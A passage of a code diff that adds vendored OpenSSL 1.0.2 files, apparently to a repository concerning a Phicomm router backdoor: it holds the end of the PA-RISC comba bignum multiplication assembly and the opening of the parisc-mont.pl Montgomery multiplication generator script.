+	MUL_ADD_C a4L,a4R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a5L,a5R,b0L,b0R,c3,c1,c2
+	STD       c3,40(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a6L,a6R,b0L,b0R,c1,c2,c3
+	MUL_ADD_C a5L,a5R,b1L,b1R,c1,c2,c3
+	MUL_ADD_C a4L,a4R,b2L,b2R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a2L,a2R,b4L,b4R,c1,c2,c3
+	MUL_ADD_C a1L,a1R,b5L,b5R,c1,c2,c3
+	MUL_ADD_C a0L,a0R,b6L,b6R,c1,c2,c3
+	STD       c1,48(r_ptr)
+	COPY      %r0,c1
+	
+	MUL_ADD_C a0L,a0R,b7L,b7R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b6L,b6R,c2,c3,c1
+	MUL_ADD_C a2L,a2R,b5L,b5R,c2,c3,c1
+	MUL_ADD_C a3L,a3R,b4L,b4R,c2,c3,c1
+	MUL_ADD_C a4L,a4R,b3L,b3R,c2,c3,c1
+	MUL_ADD_C a5L,a5R,b2L,b2R,c2,c3,c1
+	MUL_ADD_C a6L,a6R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a7L,a7R,b0L,b0R,c2,c3,c1
+	STD       c2,56(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a7L,a7R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a6L,a6R,b2L,b2R,c3,c1,c2
+	MUL_ADD_C a5L,a5R,b3L,b3R,c3,c1,c2
+	MUL_ADD_C a4L,a4R,b4L,b4R,c3,c1,c2
+	MUL_ADD_C a3L,a3R,b5L,b5R,c3,c1,c2
+	MUL_ADD_C a2L,a2R,b6L,b6R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b7L,b7R,c3,c1,c2
+	STD       c3,64(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a2L,a2R,b7L,b7R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b6L,b6R,c1,c2,c3
+	MUL_ADD_C a4L,a4R,b5L,b5R,c1,c2,c3
+	MUL_ADD_C a5L,a5R,b4L,b4R,c1,c2,c3
+	MUL_ADD_C a6L,a6R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a7L,a7R,b2L,b2R,c1,c2,c3
+	STD       c1,72(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a7L,a7R,b3L,b3R,c2,c3,c1
+	MUL_ADD_C a6L,a6R,b4L,b4R,c2,c3,c1
+	MUL_ADD_C a5L,a5R,b5L,b5R,c2,c3,c1
+	MUL_ADD_C a4L,a4R,b6L,b6R,c2,c3,c1
+	MUL_ADD_C a3L,a3R,b7L,b7R,c2,c3,c1
+	STD       c2,80(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a4L,a4R,b7L,b7R,c3,c1,c2
+	MUL_ADD_C a5L,a5R,b6L,b6R,c3,c1,c2
+	MUL_ADD_C a6L,a6R,b5L,b5R,c3,c1,c2
+	MUL_ADD_C a7L,a7R,b4L,b4R,c3,c1,c2
+	STD       c3,88(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a7L,a7R,b5L,b5R,c1,c2,c3
+	MUL_ADD_C a6L,a6R,b6L,b6R,c1,c2,c3
+	MUL_ADD_C a5L,a5R,b7L,b7R,c1,c2,c3
+	STD       c1,96(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a6L,a6R,b7L,b7R,c2,c3,c1
+	MUL_ADD_C a7L,a7R,b6L,b6R,c2,c3,c1
+	STD       c2,104(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a7L,a7R,b7L,b7R,c3,c1,c2
+	STD       c3,112(r_ptr)
+	STD       c1,120(r_ptr)
+
+    .EXIT
+    FLDD    -88(%sp),%fr13 
+    FLDD    -96(%sp),%fr12 
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+;-----------------------------------------------------------------------------
+;
+;void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+; arg0 = r_ptr
+; arg1 = a_ptr
+; arg2 = b_ptr
+;
+
+bn_mul_comba4
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_mul_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+    FSTD    %fr12,32(%sp)       ; save r6
+    FSTD    %fr13,40(%sp)       ; save r7
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD      0(a_ptr),a0       
+    FLDD      8(a_ptr),a1       
+    FLDD     16(a_ptr),a2       
+    FLDD     24(a_ptr),a3       
+
+    FLDD      0(b_ptr),b0       
+    FLDD      8(b_ptr),b1       
+    FLDD     16(b_ptr),b2       
+    FLDD     24(b_ptr),b3       
+
+	MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
+	STD       c1,0(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
+	STD       c2,8(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
+	STD       c3,16(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
+	MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
+	STD       c1,24(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
+	STD       c2,32(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
+	MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
+	STD       c3,40(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
+	STD       c1,48(r_ptr)
+	STD       c2,56(r_ptr)
+
+    .EXIT
+    FLDD    -88(%sp),%fr13 
+    FLDD    -96(%sp),%fr12 
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+
+	.SPACE	$TEXT$
+	.SUBSPA	$CODE$
+	.SPACE	$PRIVATE$,SORT=16
+	.IMPORT	$global$,DATA
+	.SPACE	$TEXT$
+	.SUBSPA	$CODE$
+	.SUBSPA	$LIT$,ACCESS=0x2c
+C$4
+	.ALIGN	8
+	.STRINGZ	"Division would overflow (%d)\n"
+	.END
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/parisc-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/parisc-mont.pl
new file mode 100644
index 0000000..c02ef6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/parisc-mont.pl
@@ -0,0 +1,995 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# On PA-7100LC this module performs ~90-50% better, less for longer
+# keys, than code generated by gcc 3.2 for PA-RISC 1.1. Latter means
+# that compiler utilized xmpyu instruction to perform 32x32=64-bit
+# multiplication, which in turn means that "baseline" performance was
+# optimal in respect to instruction set capabilities. Fair comparison
+# with vendor compiler is problematic, because OpenSSL doesn't define
+# BN_LLONG [presumably] for historical reasons, which drives compiler
+# toward 4 times 16x16=32-bit multiplicatons [plus complementary
+# shifts and additions] instead. This means that you should observe
+# several times improvement over code generated by vendor compiler
+# for PA-RISC 1.1, but the "baseline" is far from optimal. The actual
+# improvement coefficient was never collected on PA-7100LC, or any
+# other 1.1 CPU, because I don't have access to such machine with
+# vendor compiler. But to give you a taste, PA-RISC 1.1 code path
+# reportedly outperformed code generated by cc +DA1.1 +O3 by factor
+# of ~5x on PA-8600.
+#
+# On PA-RISC 2.0 it has to compete with pa-risc2[W].s, which is
+# reportedly ~2x faster than vendor compiler generated code [according
+# to comment in pa-risc2[W].s]. Here comes a catch. Execution core of
+# this implementation is actually 32-bit one, in the sense that it
+# operates on 32-bit values. But pa-risc2[W].s operates on arrays of
+# 64-bit BN_LONGs... How do they interoperate then? No problem. This
+# module picks halves of 64-bit values in reverse order and pretends
+# they were 32-bit BN_LONGs. But can 32-bit core compete with "pure"
+# 64-bit code such as pa-risc2[W].s then? Well, the thing is that
+# 32x32=64-bit multiplication is the best even PA-RISC 2.0 can do,
+# i.e. there is no "wider" multiplication like on most other 64-bit
+# platforms. This means that even being effectively 32-bit, this
+# implementation performs "64-bit" computational task in same amount
+# of arithmetic operations, most notably multiplications. It requires
+# more memory references, most notably to tp[num], but this doesn't
+# seem to exhaust memory port capacity. And indeed, dedicated PA-RISC
+# 2.0 code path provides virtually same performance as pa-risc2[W].s:
+# it's ~10% better for shortest key length and ~10% worse for longest
+# one.
+#
+# In case it wasn't clear. The module has two distinct code paths:
+# PA-RISC 1.1 and PA-RISC 2.0 ones. Latter features carry-free 64-bit
+# additions and 64-bit integer loads, not to mention specific
+# instruction scheduling. In 64-bit build naturally only 2.0 code path
+# is assembled. In 32-bit application context both code paths are
+# assembled, PA-RISC 2.0 CPU is detected at run-time and proper path
+# is taken automatically. Also, in 32-bit build the module imposes
+# couple of limitations: vector lengths has to be even and vector
+# addresses has to be 64-bit aligned. Normally neither is a problem:
+# most common key lengths are even and vectors are commonly malloc-ed,
+# which ensures alignment.
+#
+# Special thanks to polarhome.com for providing HP-UX account on
+# PA-RISC 1.1 machine, and to correspondent who chose to remain
+# anonymous for testing the code on PA-RISC 2.0 machine.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+
+$flavour = shift;
+$output = shift;
+
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$FRAME_MARKER	=80;
+	$SAVED_RP	=16;
+	$PUSH		="std";
+	$PUSHMA		="std,ma";
+	$POP		="ldd";
+	$POPMB		="ldd,mb";
+	$BN_SZ		=$SIZE_T;
+} else {
+	$LEVEL		="1.1";	#$LEVEL.="\n\t.ALLOW\t2.0";
+	$SIZE_T		=4;
+	$FRAME_MARKER	=48;
+	$SAVED_RP	=20;
+	$PUSH		="stw";
+	$PUSHMA		="stwm";
+	$POP		="ldw";
+	$POPMB		="ldwm";
+	$BN_SZ		=$SIZE_T;
+	if (open CONF,"<${dir}../../opensslconf.h") {
+	    while(<CONF>) {
+		if (m/#\s*define\s+SIXTY_FOUR_BIT/) {
+		    $BN_SZ=8;
+		    $LEVEL="2.0";
+		    last;
+		}
+	    }
+	    close CONF;
+	}
+}
+
+$FRAME=8*$SIZE_T+$FRAME_MARKER;	# 8 saved regs + frame marker
+				#                [+ argument transfer]
+$LOCALS=$FRAME-$FRAME_MARKER;
+$FRAME+=32;			# local variables
+
+$tp="%r31";
+$ti1="%r29";
+$ti0="%r28";
+
+$rp="%r26";
+$ap="%r25";
+$bp="%r24";
+$np="%r23";
+$n0="%r22";	# passed through stack in 32-bit
+$num="%r21";	# passed through stack in 32-bit
+$idx="%r20";
+$arrsz="%r19";
+
+$nm1="%r7";
+$nm0="%r6";
+$ab1="%r5";
+$ab0="%r4";
+
+$fp="%r3";
+$hi1="%r2";
+$hi0="%r1";
+
+$xfer=$n0;	# accomodates [-16..15] offset in fld[dw]s
+
+$fm0="%fr4";	$fti=$fm0;
+$fbi="%fr5L";
+$fn0="%fr5R";
+$fai="%fr6";	$fab0="%fr7";	$fab1="%fr8";
+$fni="%fr9";	$fnm0="%fr10";	$fnm1="%fr11";
+
+$code=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.EXPORT	bn_mul_mont,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR,ARGW3=GR
+	.ALIGN	64
+bn_mul_mont
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-8*$SIZE_T`,NO_CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=6
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)		; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	ldo	-$FRAME(%sp),$fp
+___
+$code.=<<___ if ($SIZE_T==4);
+	ldw	`-$FRAME_MARKER-4`($fp),$n0
+	ldw	`-$FRAME_MARKER-8`($fp),$num
+	nop
+	nop					; alignment
+___
+$code.=<<___ if ($BN_SZ==4);
+	comiclr,<=	6,$num,%r0		; are vectors long enough?
+	b		L\$abort
+	ldi		0,%r28			; signal "unhandled"
+	add,ev		%r0,$num,$num		; is $num even?
+	b		L\$abort
+	nop
+	or		$ap,$np,$ti1
+	extru,=		$ti1,31,3,%r0		; are ap and np 64-bit aligned?
+	b		L\$abort
+	nop
+	nop					; alignment
+	nop
+
+	fldws		0($n0),${fn0}
+	fldws,ma	4($bp),${fbi}		; bp[0]
+___
+$code.=<<___ if ($BN_SZ==8);
+	comib,>		3,$num,L\$abort		; are vectors long enough?
+	ldi		0,%r28			; signal "unhandled"
+	addl		$num,$num,$num		; I operate on 32-bit values
+
+	fldws		4($n0),${fn0}		; only low part of n0
+	fldws		4($bp),${fbi}		; bp[0] in flipped word order
+___
+$code.=<<___;
+	fldds		0($ap),${fai}		; ap[0,1]
+	fldds		0($np),${fni}		; np[0,1]
+
+	sh2addl		$num,%r0,$arrsz
+	ldi		31,$hi0
+	ldo		36($arrsz),$hi1		; space for tp[num+1]
+	andcm		$hi1,$hi0,$hi1		; align
+	addl		$hi1,%sp,%sp
+	$PUSH		$fp,-$SIZE_T(%sp)
+
+	ldo		`$LOCALS+16`($fp),$xfer
+	ldo		`$LOCALS+32+4`($fp),$tp
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[0]*bp[0]
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[1]*bp[0]
+	xmpyu		${fn0},${fab0}R,${fm0}
+
+	addl		$arrsz,$ap,$ap		; point at the end
+	addl		$arrsz,$np,$np
+	subi		0,$arrsz,$idx		; j=0
+	ldo		8($idx),$idx		; j++++
+
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[0]*m
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[1]*m
+	fstds		${fab0},-16($xfer)
+	fstds		${fnm0},-8($xfer)
+	fstds		${fab1},0($xfer)
+	fstds		${fnm1},8($xfer)
+	 flddx		$idx($ap),${fai}	; ap[2,3]
+	 flddx		$idx($np),${fni}	; np[2,3]
+___
+$code.=<<___ if ($BN_SZ==4);
+	mtctl		$hi0,%cr11		; $hi0 still holds 31
+	extrd,u,*=	$hi0,%sar,1,$hi0	; executes on PA-RISC 1.0
+	b		L\$parisc11
+	nop
+___
+$code.=<<___;					# PA-RISC 2.0 code-path
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[0]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	ldd		-16($xfer),$ab0
+	fstds		${fab0},-16($xfer)
+
+	extrd,u		$ab0,31,32,$hi0
+	extrd,u		$ab0,63,32,$ab0
+	ldd		-8($xfer),$nm0
+	fstds		${fnm0},-8($xfer)
+	 ldo		8($idx),$idx		; j++++
+	 addl		$ab0,$nm0,$nm0		; low part is discarded
+	 extrd,u	$nm0,31,32,$hi1
+
+L\$1st
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j+1]*bp[0]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j+1]*m
+	ldd		0($xfer),$ab1
+	fstds		${fab1},0($xfer)
+	 addl		$hi0,$ab1,$ab1
+	 extrd,u	$ab1,31,32,$hi0
+	ldd		8($xfer),$nm1
+	fstds		${fnm1},8($xfer)
+	 extrd,u	$ab1,63,32,$ab1
+	 addl		$hi1,$nm1,$nm1
+	flddx		$idx($ap),${fai}	; ap[j,j+1]
+	flddx		$idx($np),${fni}	; np[j,j+1]
+	 addl		$ab1,$nm1,$nm1
+	 extrd,u	$nm1,31,32,$hi1
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[0]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	ldd		-16($xfer),$ab0
+	fstds		${fab0},-16($xfer)
+	 addl		$hi0,$ab0,$ab0
+	 extrd,u	$ab0,31,32,$hi0
+	ldd		-8($xfer),$nm0
+	fstds		${fnm0},-8($xfer)
+	 extrd,u	$ab0,63,32,$ab0
+	 addl		$hi1,$nm0,$nm0
+	stw		$nm1,-4($tp)		; tp[j-1]
+	 addl		$ab0,$nm0,$nm0
+	 stw,ma		$nm0,8($tp)		; tp[j-1]
+	addib,<>	8,$idx,L\$1st		; j++++
+	 extrd,u	$nm0,31,32,$hi1
+
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j]*bp[0]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j]*m
+	ldd		0($xfer),$ab1
+	fstds		${fab1},0($xfer)
+	 addl		$hi0,$ab1,$ab1
+	 extrd,u	$ab1,31,32,$hi0
+	ldd		8($xfer),$nm1
+	fstds		${fnm1},8($xfer)
+	 extrd,u	$ab1,63,32,$ab1
+	 addl		$hi1,$nm1,$nm1
+	ldd		-16($xfer),$ab0
+	 addl		$ab1,$nm1,$nm1
+	ldd		-8($xfer),$nm0
+	 extrd,u	$nm1,31,32,$hi1
+
+	 addl		$hi0,$ab0,$ab0
+	 extrd,u	$ab0,31,32,$hi0
+	stw		$nm1,-4($tp)		; tp[j-1]
+	 extrd,u	$ab0,63,32,$ab0
+	 addl		$hi1,$nm0,$nm0
+	ldd		0($xfer),$ab1
+	 addl		$ab0,$nm0,$nm0
+	ldd,mb		8($xfer),$nm1
+	 extrd,u	$nm0,31,32,$hi1
+	stw,ma		$nm0,8($tp)		; tp[j-1]
+
+	ldo		-1($num),$num		; i--
+	subi		0,$arrsz,$idx		; j=0
+___
+$code.=<<___ if ($BN_SZ==4);
+	fldws,ma	4($bp),${fbi}		; bp[1]
+___
+$code.=<<___ if ($BN_SZ==8);
+	fldws		0($bp),${fbi}		; bp[1] in flipped word order
+___
+$code.=<<___;
+	 flddx		$idx($ap),${fai}	; ap[0,1]
+	 flddx		$idx($np),${fni}	; np[0,1]
+	 fldws		8($xfer),${fti}R	; tp[0]
+	addl		$hi0,$ab1,$ab1
+	 extrd,u	$ab1,31,32,$hi0
+	 extrd,u	$ab1,63,32,$ab1
+	 ldo		8($idx),$idx		; j++++
+	 xmpyu		${fai}L,${fbi},${fab0}	; ap[0]*bp[1]
+	 xmpyu		${fai}R,${fbi},${fab1}	; ap[1]*bp[1]
+	addl		$hi1,$nm1,$nm1
+	addl		$ab1,$nm1,$nm1
+	extrd,u		$nm1,31,32,$hi1
+	 fstws,mb	${fab0}L,-8($xfer)	; save high part
+	stw		$nm1,-4($tp)		; tp[j-1]
+
+	 fcpy,sgl	%fr0,${fti}L		; zero high part
+	 fcpy,sgl	%fr0,${fab0}L
+	addl		$hi1,$hi0,$hi0
+	extrd,u		$hi0,31,32,$hi1
+	 fcnvxf,dbl,dbl	${fti},${fti}		; 32-bit unsigned int -> double
+	 fcnvxf,dbl,dbl	${fab0},${fab0}
+	stw		$hi0,0($tp)
+	stw		$hi1,4($tp)
+
+	fadd,dbl	${fti},${fab0},${fab0}	; add tp[0]
+	fcnvfx,dbl,dbl	${fab0},${fab0}		; double -> 33-bit unsigned int
+	xmpyu		${fn0},${fab0}R,${fm0}
+	ldo		`$LOCALS+32+4`($fp),$tp
+L\$outer
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[0]*m
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[1]*m
+	fstds		${fab0},-16($xfer)	; 33-bit value
+	fstds		${fnm0},-8($xfer)
+	 flddx		$idx($ap),${fai}	; ap[2]
+	 flddx		$idx($np),${fni}	; np[2]
+	 ldo		8($idx),$idx		; j++++
+	ldd		-16($xfer),$ab0		; 33-bit value
+	ldd		-8($xfer),$nm0
+	ldw		0($xfer),$hi0		; high part
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[i]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	 extrd,u	$ab0,31,32,$ti0		; carry bit
+	 extrd,u	$ab0,63,32,$ab0
+	fstds		${fab1},0($xfer)
+	 addl		$ti0,$hi0,$hi0		; account carry bit
+	fstds		${fnm1},8($xfer)
+	 addl		$ab0,$nm0,$nm0		; low part is discarded
+	ldw		0($tp),$ti1		; tp[1]
+	 extrd,u	$nm0,31,32,$hi1
+	fstds		${fab0},-16($xfer)
+	fstds		${fnm0},-8($xfer)
+
+L\$inner
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j+1]*bp[i]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j+1]*m
+	ldd		0($xfer),$ab1
+	fstds		${fab1},0($xfer)
+	 addl		$hi0,$ti1,$ti1
+	 addl		$ti1,$ab1,$ab1
+	ldd		8($xfer),$nm1
+	fstds		${fnm1},8($xfer)
+	 extrd,u	$ab1,31,32,$hi0
+	 extrd,u	$ab1,63,32,$ab1
+	flddx		$idx($ap),${fai}	; ap[j,j+1]
+	flddx		$idx($np),${fni}	; np[j,j+1]
+	 addl		$hi1,$nm1,$nm1
+	 addl		$ab1,$nm1,$nm1
+	ldw		4($tp),$ti0		; tp[j]
+	stw		$nm1,-4($tp)		; tp[j-1]
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[i]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	ldd		-16($xfer),$ab0
+	fstds		${fab0},-16($xfer)
+	 addl		$hi0,$ti0,$ti0
+	 addl		$ti0,$ab0,$ab0
+	ldd		-8($xfer),$nm0
+	fstds		${fnm0},-8($xfer)
+	 extrd,u	$ab0,31,32,$hi0
+	 extrd,u	$nm1,31,32,$hi1
+	ldw		8($tp),$ti1		; tp[j]
+	 extrd,u	$ab0,63,32,$ab0
+	 addl		$hi1,$nm0,$nm0
+	 addl		$ab0,$nm0,$nm0
+	 stw,ma		$nm0,8($tp)		; tp[j-1]
+	addib,<>	8,$idx,L\$inner		; j++++
+	 extrd,u	$nm0,31,32,$hi1
+
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j]*bp[i]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j]*m
+	ldd		0($xfer),$ab1
+	fstds		${fab1},0($xfer)
+	 addl		$hi0,$ti1,$ti1
+	 addl		$ti1,$ab1,$ab1
+	ldd		8($xfer),$nm1
+	fstds		${fnm1},8($xfer)
+	 extrd,u	$ab1,31,32,$hi0
+	 extrd,u	$ab1,63,32,$ab1
+	ldw		4($tp),$ti0		; tp[j]
+	 addl		$hi1,$nm1,$nm1
+	 addl		$ab1,$nm1,$nm1
+	ldd		-16($xfer),$ab0
+	ldd		-8($xfer),$nm0
+	 extrd,u	$nm1,31,32,$hi1
+
+	addl		$hi0,$ab0,$ab0
+	 addl		$ti0,$ab0,$ab0
+	 stw		$nm1,-4($tp)		; tp[j-1]
+	 extrd,u	$ab0,31,32,$hi0
+	ldw		8($tp),$ti1		; tp[j]
+	 extrd,u	$ab0,63,32,$ab0
+	 addl		$hi1,$nm0,$nm0
+	ldd		0($xfer),$ab1
+	 addl		$ab0,$nm0,$nm0
+	ldd,mb		8($xfer),$nm1
+	 extrd,u	$nm0,31,32,$hi1
+	 stw,ma		$nm0,8($tp)		; tp[j-1]
+
+	addib,=		-1,$num,L\$outerdone	; i--
+	subi		0,$arrsz,$idx		; j=0
+___
+$code.=<<___ if ($BN_SZ==4);
+	fldws,ma	4($bp),${fbi}		; bp[i]
+___
+$code.=<<___ if ($BN_SZ==8);
+	ldi		12,$ti0			; bp[i] in flipped word order
+	addl,ev		%r0,$num,$num
+	ldi		-4,$ti0
+	addl		$ti0,$bp,$bp
+	fldws		0($bp),${fbi}
+___
+$code.=<<___;
+	 flddx		$idx($ap),${fai}	; ap[0]
+	addl		$hi0,$ab1,$ab1
+	 flddx		$idx($np),${fni}	; np[0]
+	 fldws		8($xfer),${fti}R	; tp[0]
+	addl		$ti1,$ab1,$ab1
+	extrd,u		$ab1,31,32,$hi0
+	extrd,u		$ab1,63,32,$ab1
+
+	 ldo		8($idx),$idx		; j++++
+	 xmpyu		${fai}L,${fbi},${fab0}	; ap[0]*bp[i]
+	 xmpyu		${fai}R,${fbi},${fab1}	; ap[1]*bp[i]
+	ldw		4($tp),$ti0		; tp[j]
+
+	addl		$hi1,$nm1,$nm1
+	 fstws,mb	${fab0}L,-8($xfer)	; save high part
+	addl		$ab1,$nm1,$nm1
+	extrd,u		$nm1,31,32,$hi1
+	 fcpy,sgl	%fr0,${fti}L		; zero high part
+	 fcpy,sgl	%fr0,${fab0}L
+	stw		$nm1,-4($tp)		; tp[j-1]
+
+	 fcnvxf,dbl,dbl	${fti},${fti}		; 32-bit unsigned int -> double
+	 fcnvxf,dbl,dbl	${fab0},${fab0}
+	addl		$hi1,$hi0,$hi0
+	 fadd,dbl	${fti},${fab0},${fab0}	; add tp[0]
+	addl		$ti0,$hi0,$hi0
+	extrd,u		$hi0,31,32,$hi1
+	 fcnvfx,dbl,dbl	${fab0},${fab0}		; double -> 33-bit unsigned int
+	stw		$hi0,0($tp)
+	stw		$hi1,4($tp)
+	 xmpyu		${fn0},${fab0}R,${fm0}
+
+	b		L\$outer
+	ldo		`$LOCALS+32+4`($fp),$tp
+
+L\$outerdone
+	addl		$hi0,$ab1,$ab1
+	addl		$ti1,$ab1,$ab1
+	extrd,u		$ab1,31,32,$hi0
+	extrd,u		$ab1,63,32,$ab1
+
+	ldw		4($tp),$ti0		; tp[j]
+
+	addl		$hi1,$nm1,$nm1
+	addl		$ab1,$nm1,$nm1
+	extrd,u		$nm1,31,32,$hi1
+	stw		$nm1,-4($tp)		; tp[j-1]
+
+	addl		$hi1,$hi0,$hi0
+	addl		$ti0,$hi0,$hi0
+	extrd,u		$hi0,31,32,$hi1
+	stw		$hi0,0($tp)
+	stw		$hi1,4($tp)
+
+	ldo		`$LOCALS+32`($fp),$tp
+	sub		%r0,%r0,%r0		; clear borrow
+___
+$code.=<<___ if ($BN_SZ==4);
+	ldws,ma		4($tp),$ti0
+	extru,=		$rp,31,3,%r0		; is rp 64-bit aligned?
+	b		L\$sub_pa11
+	addl		$tp,$arrsz,$tp
+L\$sub
+	ldwx		$idx($np),$hi0
+	subb		$ti0,$hi0,$hi1
+	ldwx		$idx($tp),$ti0
+	addib,<>	4,$idx,L\$sub
+	stws,ma		$hi1,4($rp)
+
+	subb		$ti0,%r0,$hi1
+	ldo		-4($tp),$tp
+___
+$code.=<<___ if ($BN_SZ==8);
+	ldd,ma		8($tp),$ti0
+L\$sub
+	ldd		$idx($np),$hi0
+	shrpd		$ti0,$ti0,32,$ti0	; flip word order
+	std		$ti0,-8($tp)		; save flipped value
+	sub,db		$ti0,$hi0,$hi1
+	ldd,ma		8($tp),$ti0
+	addib,<>	8,$idx,L\$sub
+	std,ma		$hi1,8($rp)
+
+	extrd,u		$ti0,31,32,$ti0		; carry in flipped word order
+	sub,db		$ti0,%r0,$hi1
+	ldo		-8($tp),$tp
+___
+$code.=<<___;
+	and		$tp,$hi1,$ap
+	andcm		$rp,$hi1,$bp
+	or		$ap,$bp,$np
+
+	sub		$rp,$arrsz,$rp		; rewind rp
+	subi		0,$arrsz,$idx
+	ldo		`$LOCALS+32`($fp),$tp
+L\$copy
+	ldd		$idx($np),$hi0
+	std,ma		%r0,8($tp)
+	addib,<>	8,$idx,.-8		; L\$copy
+	std,ma		$hi0,8($rp)	
+___
+
+if ($BN_SZ==4) {				# PA-RISC 1.1 code-path
